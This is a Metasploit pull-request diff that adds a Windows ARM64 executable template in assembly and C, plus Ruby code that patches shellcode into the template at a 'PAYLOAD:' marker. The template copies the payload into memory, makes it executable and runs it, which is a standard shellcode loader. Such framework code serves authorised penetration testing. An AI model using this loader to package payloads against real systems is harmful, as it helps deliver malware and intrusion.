Merge pull request #20357 from xaitax/add-windows-aarch64-winexec-payload

Revive and Finalize windows/aarch64/exec Payload

Author: bwatters-r7

data/templates/src/pe/exe/template_aarch64_windows.asm

@@ -0,0 +1,98 @@
+;
+; A minimal AArch64 PE template for Metasploit shellcode
+; Author: Alexander 'xaitax' Hagenah
+;
+; --- Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Assemble:
+;    armasm64.exe -o template_aarch64_windows.obj template_aarch64_windows.asm
+;
+; 2. Link:
+;    LINK.exe template_aarch64_windows.obj /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+;
+;
+; --- Cross Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Locate Cross Compiler Tools and Libraries
+;     In this case: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\
+;     And: C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64
+; 2. Assemble:
+;    "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\armasm64.exe" -o template_aarch64_windows.obj template_aarch64_windows.asm
+; 3. Link:
+;    "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\link.exe"  template_aarch64_windows.obj /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64" /MACHINE:ARM64 /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+        AREA    |.text|, CODE, READONLY
+
+; Import the Win32 functions we need from kernel32.dll
+        IMPORT  VirtualAlloc
+        IMPORT  VirtualProtect
+        IMPORT  ExitProcess
+
+; Define constants for Win32 API calls
+SCSIZE          EQU     4096
+MEM_COMMIT      EQU     0x1000
+PAGE_READWRITE  EQU     0x04
+PAGE_EXECUTE    EQU     0x10
+
+; Export the entry point of our program
+        EXPORT main
+
+main
+        ; Allocate space on the stack for the oldProtection variable (DWORD)
+        sub     sp, sp, #16
+        
+        ; --- 1. Allocate executable memory ---
+        ; hfRet = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT, PAGE_READWRITE);
+        mov     x0, #0
+        mov     x1, #SCSIZE
+        mov     x2, #MEM_COMMIT
+        mov     x3, #PAGE_READWRITE
+        ldr     x8, =VirtualAlloc
+        blr     x8
+
+        ; Check if VirtualAlloc failed. If so, exit.
+        cbz     x0, exit_fail
+
+        ; Save the pointer to our new executable buffer in a non-volatile register
+        mov     x19, x0
+
+        ; --- 2. Copy the payload into the new buffer ---
+        ; This is a simple memcpy(dest, src, size)
+        mov     x0, x19                 ; x0 = dest = our new buffer
+        ldr     x1, =payload_buffer     ; x1 = src = the payload in our .data section
+        mov     x2, #SCSIZE             ; x2 = count
+copy_loop
+        ldrb    w3, [x1], #1            ; Load byte from src, increment src pointer
+        strb    w3, [x0], #1            ; Store byte to dest, increment dest pointer
+        subs    x2, x2, #1              ; Decrement counter
+        b.ne    copy_loop               ; Loop if not zero
+
+        ; --- 3. Change memory permissions to executable ---
+        ; VirtualProtect(hfRet, SCSIZE, PAGE_EXECUTE, &dwOldProtect);
+        mov     x0, x19                 ; x0 = buffer address
+        mov     x1, #SCSIZE             ; x1 = size
+        mov     x2, #PAGE_EXECUTE       ; x2 = new protection
+        mov     x3, sp                  ; x3 = pointer to oldProtection on the stack
+        ldr     x8, =VirtualProtect
+        blr     x8
+
+        ; --- 4. Execute the payload ---
+        ; Jump to the shellcode we just copied and protected.
+        blr     x19
+
+exit_success
+        ; Shellcode returned, or we are done. Exit cleanly.
+        mov     x0, #0                  ; Exit code 0
+        ldr     x8, =ExitProcess
+        blr     x8
+        
+exit_fail
+        ; Something went wrong. Exit with code 1.
+        mov     x0, #1
+        ldr     x8, =ExitProcess
+        blr     x8
+
+; The data section where the payload will be located.
+; The 'PAYLOAD:' tag must be at the very beginning of this buffer.
+payload_buffer
+        DCB     "PAYLOAD:"
+        SPACE   SCSIZE - 8 ; Reserve the rest of the 4096 bytes
+
+        END

data/templates/src/pe/exe/template_aarch64_windows.c

@@ -0,0 +1,69 @@
+// AArch64 PE EXE Template for Metasploit Framework
+//
+// -----------------------------------------------------------------------------
+//
+// Compilation Instructions:
+//
+//   Using MSVC on a Windows ARM64 Host:
+//
+//   cl.exe /nologo /O2 /W3 /GS- /D_WIN64 template_aarch64_windows.c /link ^
+//   /subsystem:windows /machine:arm64 /entry:main ^
+//   /out:template_aarch64_windows.exe kernel32.lib
+//
+// -----------------------------------------------------------------------------
+
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#undef WIN32_LEAN_AND_MEAN
+
+#define PAYLOAD_MARKER "PAYLOAD:"
+#define SCSIZE 8192
+
+char payload[SCSIZE] = PAYLOAD_MARKER;
+
+int main(void)
+{
+    void *exec_mem;
+    DWORD old_prot;
+    HANDLE hThread;
+
+    // Stage 1: Allocate a block of memory. We request READWRITE permissions
+    // initially so we can copy our payload into it.
+    exec_mem = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (exec_mem == NULL)
+    {
+        // Fail silently if allocation fails.
+        return 1;
+    }
+
+    // Stage 2: Copy the payload from our data section into the new memory block.
+    // A simple loop is used for maximum compiler compatibility and to avoid
+    // needing extra headers like <string.h> for memcpy.
+    for (int i = 0; i < SCSIZE; i++)
+    {
+        ((char *)exec_mem)[i] = payload[i];
+    }
+
+    // Stage 3: Change the memory's protection flags from READWRITE to
+    // EXECUTE_READ.
+    if (VirtualProtect(exec_mem, SCSIZE, PAGE_EXECUTE_READ, &old_prot) == FALSE)
+    {
+        // Fail silently if we cannot make the memory executable.
+        return 1;
+    }
+
+    // Stage 4: Execute the shellcode.
+    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
+    if (hThread)
+    {
+        WaitForSingleObject(hThread, INFINITE);
+        CloseHandle(hThread);
+    }
+    else
+    {
+        // As a fallback in case CreateThread fails, call the shellcode directly.
+        ((void (*)())exec_mem)();
+    }
+
+    return 0;
+}

data/templates/template_aarch64_windows.exe

@@ -536,6 +536,27 @@ def self.string_to_pushes(string)
     pushes
   end
 
+  # Converts a raw AArch64 payload into a PE executable.
+  #
+  # @param framework [Msf::Framework] The framework instance.
+  # @param code [String] The raw AArch64 shellcode.
+  # @param opts [Hash] The options hash.
+  # @option opts [String] :template The path to a custom PE template.
+  # @return [String] The generated PE executable as a binary string.
+  def self.to_winaarch64pe(framework, code, opts = {})
+    # Use the standard template if not specified by the user.
+    # This helper finds the full path and stores it in opts[:template].
+    set_template_default(opts, 'template_aarch64_windows.exe')
+
+    # Read the template directly from the path now stored in the options.
+    pe = File.read(opts[:template], mode: 'rb')
+
+    # Find the tag and inject the payload
+    bo = find_payload_tag(pe, 'Invalid Windows AArch64 template: missing "PAYLOAD:" tag')
+    pe[bo, code.length] = code.dup
+    pe
+  end
+
   # self.exe_sub_method
   #
   # @param  code [String]
@@ -2137,6 +2158,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
         to_win32pe(framework, code, exeopts)
       when ARCH_X64
         to_win64pe(framework, code, exeopts)
+      when ARCH_AARCH64
+        to_winaarch64pe(framework, code, exeopts)
       end
     when 'exe-service'
       case arch